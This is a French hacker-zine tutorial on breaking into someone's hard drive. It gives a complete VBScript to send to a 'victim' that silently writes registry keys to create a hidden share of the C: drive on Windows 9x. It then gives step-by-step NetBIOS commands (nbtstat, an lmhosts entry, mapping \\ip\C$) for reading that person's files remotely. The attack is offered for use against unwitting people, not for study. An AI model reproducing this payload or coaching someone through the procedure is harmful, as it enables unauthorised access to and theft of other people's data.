²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² ² 7°/Accèder au contenu du disque dur de quelqu'un ² ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² Cette méthode est en fait un complèment à la méthode parue dans le premier HackZine, qui expliquait comment lire le contenu du disque dur de quelqu'un par NetBios. Cette méthode, en effet, marche très très rarement :((; l'astuce que je vous propose va vous permettre d'ouvrir le port netbios (139) de la victime, et de lui activer l'option du partage des fichiers.... Pour ce faire, nous allons créer un fichier qui, si la victime l'ouvre, va entrer de nouvelles valeurs dans sa base de registre, et qui activera l'option "Partage de fichiers", qui nous permettra par la suite de le hacker par NetBios. Ce fichier est un fichier *.vbs, visual basic quoi... Ouvrez donc le bloc-notes, et tapez (les > représentent le début de chaque ligne, ne les tapez pas ;)) ) : >Set WshShell = CreateObject("WScript.Shell") >WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Flags",770, "REG_DWORD" >WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Parmlenc", 6837, "REG_BINARY" >WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Parm2enc", 0, "REG_BINARY" >WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Path", "C:\" >WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Remark","" >WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Type", 0, "REG_DWORD" Enregistrez maintenant cela en *.vbs et envoyez le fichier à votre victime. Maintenant que la victime l'a ouvert, faites un clique droit sur l'icône "Voisinage réseau", cliquez sur "Se connecter à un lecteur réseau" et spécifier le chemin d'accès, qui est : \\ip\C$ Où "ip" reprèsente l'adresse ip de la victime et où "$" devant "C" sert à rendre invisible le partage de fichiers (niark niark). Et comme je suis généreux, je vais vous réexpliquer comment accèder à son disque dur... (des fois que vous n'aurez pas lu mon zine précédent :(( ). Alors pour commencer, sachez qu'il existe une passerelle entre le protocole TCP/IP et le protocole NETBEUI, qui fonctionne au moyen de Netbios, et c'est avec Netbios que nous allons pouvoir hacker notre pauvre victime... Pour cela, vous, vous et votre victime, devez possèder Win9x (95 ou 98 kôa), ainsi que l'option "Partage des fichiers activé". Pour activer cette option, c'est très simple, allez dans le Panneau de configuration, cliquez sur l'icône réseau puis sur l'option Partage des fichiers et de l'imprimante, et voilà, le tour est joué. :)) Bon, tout est en place, allons y. Ouvrez une fenêtre DOS et tapez : >nbtstat -a ip (ou ip représente l'ip de la victime) Une liste de noms d'oiseaux (façon de parler :-) ) va alors s'afficher. Si ce n'est pas le cas changez de victime, elle n'a pas NetBios d'installé. Voilà ce que cela devrait donner : NetBIOS Remote Machine Name Table Name Type Status -------------------------------------------------- MONORDINATEUR <00> UNIQUE Registered MONGROUPE <00> GROUP Registered MONORDINATEUR <03> UNIQUE Registered MONORDINATEUR <20> UNIQUE Registered MONGROUPE <1E> GROUP Registered MAC Address = 44-45-53-54-00-00 Ce qui nous interesse dans cette liste, c'est le nom d'ordinateur avec le <20>, UNIQUE et Registered écris devant, retenez donc ce nom. Maintenant on va éditer le fichier lmhsot.sam. Toujours sous DOS, tapez : >edit lmhost.sam Vous allez vous aperçevoir que ce fichier est vide, tapez donc à l'intérieur : >MONORDINATEUR ip #PRE Où MONORDINATEUR représente le nom du pc de la victime, et ip son adresse ip. Restez sous DOS et tapez : >NBTSTAT -R Vous devriez alors obtenir, si tout se passe bien, ce message : Successful purge and preload of the NBT Remote Cache Name Table C'est à ce moment là que tout va se jouer.... Quittez la fenêtre MS-DOS (tapez "exit"), allez dans démarrer/rechercher/ordinateur distant puis tapez le nom du pc de la victime (ici MONORDINATEUR). Si un nom de pc s'affiche, c'est gagné, c'est celui de la victime, vous allez donc pouvoir accèder à son DD ... Hummm, voilà, c'est tout ce que l'on peut dire sur cette méthode d'infiltration... Bonne chance !!! :))